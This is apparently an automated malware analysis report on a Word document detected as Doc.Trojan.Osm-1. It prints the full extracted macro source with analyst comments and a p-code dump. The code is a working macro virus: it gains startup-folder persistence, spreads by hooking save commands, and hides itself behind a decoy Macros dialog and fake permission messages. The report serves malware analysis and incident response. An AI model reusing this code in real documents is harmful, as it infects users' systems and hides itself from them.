Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b363b02ede1c3f9b…

MALICIOUS

Office (OLE)

269.0 KB Created: 1998-11-10 03:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1d7a4af41912c4f0d28ede1cb5ec6fca SHA-1: 73beb9d3750dfb9326c6c1f46e97a7839b453696 SHA-256: b363b02ede1c3f9b47e80f6d12fcded51caec799cc11bd0ece83a0f352668034
236 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains legacy WordBasic macro markers and a critical ClamAV detection for 'Doc.Trojan.Osm-1'. The AutoOpen macro attempts to copy the current document's attached template to the Word startup directory as 'Startup.dot' using FCopy (a Declare alias for kernel32 CopyFileA), which is a persistence mechanism; in the extracted source this copy is reached through the macro's error handler, i.e. when FileLen finds no existing 'Startup.dot'. The module also attempts to copy this 'Startup.dot' to 'Default.dot' in the active document's path and set it as the attached template (in its Copy routine, which is hooked to FileSave and FileSaveAs), potentially to ensure future documents also run the macro.

Heuristics 6

  • ClamAV: Doc.Trojan.Osm-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Osm-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 275,456 bytes but its declared streams total only 54,531 bytes — 220,925 bytes (80%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). For this sample only the macro source was carved (see Extracted artifacts), so the slack content itself is not characterized here; read the exploit-payload description as the heuristic's general rationale rather than a confirmed finding for this file.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9435 bytes
SHA-256: 7d51b7f16a13f15e472334e392624cdf75d48f45527311085439f2e44b13dd07
Detection
ClamAV: Doc.Trojan.Osm-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ThisDocument module: the document's own class module. The VB_Base GUID looks
' like Word's standard Document class id rather than anything sample-specific
' (NOTE(review): confirm). The only handler here, Document_New, is empty; all
' active logic lives in the NewMacros and dlgMyMacs modules below.
Private Sub Document_New()

End Sub

Attribute VB_Name = "NewMacros"
' NewMacros module. Several Subs below (FileSave, FileSaveAs, ToolsMacro,
' ToolsRecordMacroToggle) carry the names of Word built-in commands; Word
' treats a macro named after a built-in command as an override of it while
' the containing template is loaded, which is how this code hooks save and
' macro-management actions.
' FCopy is a Declare alias for kernel32 CopyFileA (src, dest, bFailIfExists);
' every call site passes False for the last argument, i.e. overwrite.
' Detection note: the Win32 import lets the copy bypass Word's own file
' handling, so look for the declared alias in extracted macro text.
Private Declare Function FCopy Lib "kernel32" Alias "CopyFileA" (ByVal src As String, ByVal dest As String, ByVal FailExist As Boolean) As Boolean
' AutoExec runs at Word start-up for templates in the startup folder, i.e.
' once the Startup.dot copy is in place. Install check: FileLen on a missing
' "Startup.dot" raises a run-time error, so the p0p handler (not the If) is
' the path that reaches Insert — the template is (re)copied only when absent.
' The MsgBox "1" branch fires only for an existing file under 10 bytes.
Sub AutoExec()
    On Error GoTo p0p
    If FileLen(Application.StartupPath + "\Startup.dot") < 10 Then MsgBox ("1")
    Exit Sub
    
p0p:
    Insert
End Sub

' AutoOpen runs when the document is opened. Same install check as AutoExec:
' FileLen on a missing "Startup.dot" raises a run-time error, so the p0p
' handler (Insert, then EntryPoint) is what actually installs the template;
' the MsgBox "1" branch fires only for an existing file under 10 bytes.
' The VB_Description attribute below is the original author's recorded
' creation note and is kept as evidence.
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro created 03/11/98 by ITSC"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "TemplateProject.NewMacros.AutoOpen"
    On Error GoTo p0p
    If FileLen(Application.StartupPath + "\Startup.dot") < 10 Then MsgBox ("1")
    Exit Sub
    
p0p:
    Insert
    EntryPoint
End Sub
' AutoClose runs when the document closes. Marking the Normal template as
' saved suppresses Word's "save changes to Normal?" prompt at exit, so any
' modification of Normal during the session is not surfaced to the user.
Sub AutoClose()
    Application.NormalTemplate.Saved = True
End Sub

' Insert: the persistence step (MITRE T1547.001, Startup folder). Copies the
' active document's attached template to <Word StartupPath>\Startup.dot via
' the kernel32 CopyFileA alias, overwriting any existing file (third argument
' False). Errors are swallowed by On Error Resume Next and screen updating is
' disabled around the copy, so the user sees nothing.
' IR note: the artifact to look for is Startup.dot in the Word startup path.
Sub Insert()
    On Error Resume Next
    Application.ScreenUpdating = False
    
    ' Note: in VBA "Dim src, dest As String" types only dest; src is Variant.
    Dim src, dest As String
    dest = Application.StartupPath + "\Startup.dot"
    src = ActiveDocument.AttachedTemplate.FullName
       
    FCopy src, dest, False
    
    Application.ScreenUpdating = True

End Sub

' Copy: the propagation step, invoked from the FileSave / FileSaveAs overrides.
' Copies the installed Startup.dot to Default.dot beside the active document,
' attaches that file as the document's template and saves the document, so the
' saved file carries a reference to the macro-bearing template next to it.
' All errors are suppressed; screen updating is off during the copy.
' IR note: a Default.dot sitting next to user documents is the artifact here.
Sub Copy()
    On Error Resume Next
    Dim src, dest As String
    dest = ActiveDocument.Path + "\Default.dot"
    src = Application.StartupPath + "\Startup.dot"
    
    Application.ScreenUpdating = False
    FCopy src, dest, False
        
    ActiveDocument.AttachedTemplate = dest
    ActiveDocument.Save
    
    Application.ScreenUpdating = True
End Sub
' FileSave overrides Word's built-in Save command: performs the save the user
' asked for, then runs Copy (Default.dot propagation) behind it.
Sub FileSave()

    ActiveDocument.Save
    Copy
End Sub
' FileSaveAs overrides Word's built-in Save As command: shows the real Save As
' dialog so the user's action completes normally, then runs Copy.
Sub FileSaveAs()

    Dialogs(wdDialogFileSaveAs).Show
    Copy
End Sub

' ToolsMacro overrides Word's built-in Tools > Macro > Macros command. Instead
' of the real dialog it loads the custom dlgMyMacs form and fills its combo
' box with the same "Macros in:" entries the genuine dialog shows, with an
' empty macro list. The form's buttons (see the dlgMyMacs module) only hide
' the form or show a permission message, so the user cannot inspect or delete
' these macros through the UI. This is the anti-analysis / defence-evasion
' part of the sample.
Sub ToolsMacro()
    On Error Resume Next
    Load dlgMyMacs
    
    dlgMyMacs.cmbIn.Clear
    dlgMyMacs.TextBox1.Text = ""
    dlgMyMacs.cmbIn.AddItem "All active templates and documents"
    dlgMyMacs.cmbIn.SelText = "All active templates and documents"
    dlgMyMacs.cmbIn.AddItem "Normal (global template)"
    dlgMyMacs.cmbIn.AddItem "Word commands"
    dlgMyMacs.cmbIn.AddItem ActiveDocument.Name + " (document)"
    
    dlgMyMacs.Show

End Sub

' ToolsRecordMacroToggle overrides the built-in macro-recorder toggle: rather
' than recording, it shows a fake "no permission" message with the title
' "Microsoft Word" so the refusal looks like an OS/application policy.
Sub ToolsRecordMacroToggle()
Attribute ToolsRecordMacroToggle.VB_Description = "Turns macro recording on or off"
Attribute ToolsRecordMacroToggle.VB_ProcData.VB_Invoke_Func = "TemplateProject.NewMacros.ToolsRecordMacroToggle"
    MsgBox "You do not have permission to create macros on this computer.", vbOKOnly, "Microsoft Word"
End Sub

' EntryPoint is called from AutoOpen's error path after Insert. It activates
' the document's first Shape and then marks the document as saved, which
' hides the dirty state from the user. What Shapes(1) contains is not visible
' in this listing (NOTE(review): inspect the document body to confirm).
Sub EntryPoint()
    ThisDocument.Shapes(1).Activate
    ThisDocument.Saved = True
End Sub

' Show makes the document's first Shape visible. Not called from any Sub in
' this listing; it may be bound to a control or run manually.
Sub Show()
    ThisDocument.Shapes(1).Visible = msoTrue
End Sub

' Hide makes the document's first Shape invisible (counterpart of Show). Not
' called from any Sub in this listing.
Sub Hide()
    ThisDocument.Shapes(1).Visible = msoFalse
End Sub

Attribute VB_Name = "dlgMyMacs"
Attribute VB_Base = "0{00F9188F-DD07-11D2-8BD1-08002B3FF385}{00F91880-DD07-11D2-8BD1-08002B3FF385}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' dlgMyMacs: the UserForm that ToolsMacro shows in place of Word's Macros
' dialog. Only three button handlers exist; none of them lists, runs or
' deletes macros.

' Button 3: just dismisses the decoy dialog.
Private Sub CommandButton3_Click()
    dlgMyMacs.Hide
End Sub

' Button 4: same as button 3, dismisses the decoy dialog.
Private Sub CommandButton4_Click()
    dlgMyMacs.Hide
End Sub

' Button 6: shows the same fake "no permission" message as
' ToolsRecordMacroToggle, again titled "Microsoft Word".
Private Sub CommandButton6_Click()
    MsgBox "You do not have permission to create macros on this computer.", vbOKOnly, "Microsoft Word"
End Sub

' Processing file: /tmp/qstore_uro401s8
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2330 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_New())
' Line #1:
' Line #2:
' 	EndSub 
' Macros/VBA/NewMacros - 14514 bytes
' Line #0:
' 	FuncDefn (Private Declare Function FCopy Lib "kernel32" (ByVal src As String, ByVal dest As String, ByVal FailExist As Boolean) As Boolean)
' Line #1:
' 	FuncDefn (Sub AutoExec())
' Line #2:
' 	OnError p0p 
' Line #3:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x000C "\Startup.dot"
' 	Add 
' 	ArgsLd FileLen 0x0001 
' 	LitDI2 0x000A 
' 	Lt 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0001 "1"
' 	Paren 
' 	ArgsCall MsgBox 0x0001 
' 	EndIf 
' Line #4:
' 	ExitSub 
' Line #5:
' Line #6:
' 	Label p0p 
' Line #7:
' 	ArgsCall Insert 0x0000 
' Line #8:
' 	EndSub 
' Line #9:
' Line #10:
' 	FuncDefn (Sub AutoOpen())
' Line #11:
' 	OnError p0p 
' Line #12:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x000C "\Startup.dot"
' 	Add 
' 	ArgsLd FileLen 0x0001 
' 	LitDI2 0x000A 
' 	Lt 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0001 "1"
' 	Paren 
' 	ArgsCall MsgBox 0x0001 
' 	EndIf 
' Line #13:
' 	ExitSub 
' Line #14:
' Line #15:
' 	Label p0p 
' Line #16:
' 	ArgsCall Insert 0x0000 
' Line #17:
' 	ArgsCall EntryPoint 0x0000 
' Line #18:
' 	EndSub 
' Line #19:
' 	FuncDefn (Sub AutoClose())
' Line #20:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemLd NormalTemplate 
' 	MemSt Saved 
' Line #21:
' 	EndSub 
' Line #22:
' Line #23:
' 	FuncDefn (Sub Insert())
' Line #24:
' 	OnError (Resume Next) 
' Line #25:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #26:
' Line #27:
' 	Dim 
' 	VarDefn src
' 	VarDefn dest (As String)
' Line #28:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x000C "\Startup.dot"
' 	Add 
' 	St dest 
' Line #29:
' 	Ld ActiveDocument 
' 	MemLd AttachedTemplate 
' 	MemLd FullName 
' 	St src 
' Line #30:
' Line #31:
' 	Ld src 
' 	Ld dest 
' 	LitVarSpecial (False)
' 	ArgsCall FCopy 0x0003 
' Line #32:
' Line #33:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #34:
' Line #35:
' 	EndSub 
' Line #36:
' Line #37:
' 	FuncDefn (Sub Copy())
' Line #38:
' 	OnError (Resume Next) 
' Line #39:
' 	Dim 
' 	VarDefn src
' 	VarDefn dest (As String)
' Line #40:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x000C "\Default.dot"
' 	Add 
' 	St dest 
' Line #41:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x000C "\Startup.dot"
' 	Add 
' 	St src 
' Line #42:
' Line #43:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #44:
' 	Ld src 
' 	Ld dest 
' 	LitVarSpecial (False)
' 	ArgsCall FCopy 0x0003 
' Line #45:
' Line #46:
' 	Ld dest 
' 	Ld ActiveDocument 
' 	MemSt AttachedTemplate 
' Line #47:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #48:
' Line #49:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #50:
' 	EndSub 
' Line #51:
' 	FuncDefn (Sub FileSave())
' Line #52:
' Line #53:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #54:
' 	ArgsCall Copy 0x0000 
' Line #55:
' 	EndSub 
' Line #56:
' 	FuncDefn (Sub FileSaveAs())
' Line #57:
' Line #58:
' 	Ld wdDialogFileSaveAs 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #59:
' 	ArgsCall Copy 0x0000 
' Line #60:
' 	EndSub 
' Line #61:
' Line #62:
' 	FuncDefn (Sub ToolsMacro())
' Line #63:
' 	OnError (Resume Next) 
' Line #64:
' 	Ld dlgMyMacs 
' 	ArgsCall Local 0x0001 
' Line #65:
' Line #66:
' 	Ld dlgMyMacs 
' 	MemLd cmbIn 
' 	ArgsMemCall Clear 0x0000 
' Line #67:
' 	LitStr 0x0000 ""
' 	Ld dlgMyMacs 
' 	MemLd TextBox1 
' 	MemSt Then 
' Line #68:
' 	LitStr 0x0022 "All active templates and documents"
' 	Ld dlgMyMacs 
' 	MemLd cmbIn 
' 	ArgsMemCall AddItem 0x0001 
' Line #69:
' 	LitStr 0x0022 "All active templates and documents"
' 	Ld dlgMyMacs 
' 	MemLd cmbIn 
' 	MemSt SelText 
' Line #70:
' 	LitStr 0x0018 "Normal (global template)"
' 	Ld dlgMyMacs 
' 	MemLd cmbIn 
' 	ArgsMemCall AddItem 0x0001 
' Line #71:
' 	LitStr 0x000D "Word commands"
' 	Ld dlgMyMacs 
' 	MemLd cmbIn 
' 	ArgsMemCall AddItem 0x0001 
' Line #72:
' 	Ld ActiveDocument 
' 	MemLd New 
' 	LitStr 0x000B " (document)"
' 	Add 
' 	Ld dlgMyMacs 
' 	MemLd cmbIn 
' 	ArgsMemCall AddItem 0x0001 
' Line #73:
' Line #74:
' 	Ld dlgMyMacs 
' 	ArgsMemCall Show 0x0000 
' Line #75:
' Line #76:
' 	EndSub 
' Line #77:
' Line #78:
' 	FuncDefn (Sub ToolsRecordMacroToggle())
' Line #79:
' 	LitStr 0x003D "You do not have permission to create macros on this computer."
' 	Ld vbOKOnly 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall MsgBox 0x0003 
' Line #80:
' 	EndSub 
' Line #81:
' Line #82:
' 	FuncDefn (Sub EntryPoint())
' Line #83:
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	ArgsMemLd Shapes 0x0001 
' 	ArgsMemCall Activate 0x0000 
' Line #84:
' 	LitVarSpecial (True)
' 	Ld ThisDocument 
' 	MemSt Saved 
' Line #85:
' 	EndSub 
' Line #86:
' Line #87:
' 	FuncDefn (Sub Show())
' Line #88:
' 	Ld msoTrue 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	ArgsMemLd Shapes 0x0001 
' 	MemSt Visible 
' Line #89:
' 	EndSub 
' Line #90:
' Line #91:
' 	FuncDefn (Sub Hide())
' Line #92:
' 	Ld msoFalse 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	ArgsMemLd Shapes 0x0001 
' 	MemSt Visible 
' Line #93:
' 	EndSub 
' Macros/VBA/dlgMyMacs - 3297 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub CommandButton3_Click())
' Line #2:
' 	Ld dlgMyMacs 
' 	ArgsMemCall Hide 0x0000 
' Line #3:
' 	EndSub 
' Line #4:
' Line #5:
' 	FuncDefn (Private Sub CommandButton4_Click())
' Line #6:
' 	Ld dlgMyMacs 
' 	ArgsMemCall Hide 0x0000 
' Line #7:
' 	EndSub 
' Line #8:
' Line #9:
' 	FuncDefn (Private Sub CommandButton6_Click())
' Line #10:
' 	LitStr 0x003D "You do not have permission to create macros on this computer."
' 	Ld vbOKOnly 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall MsgBox 0x0003 
' Line #11:
' 	EndSub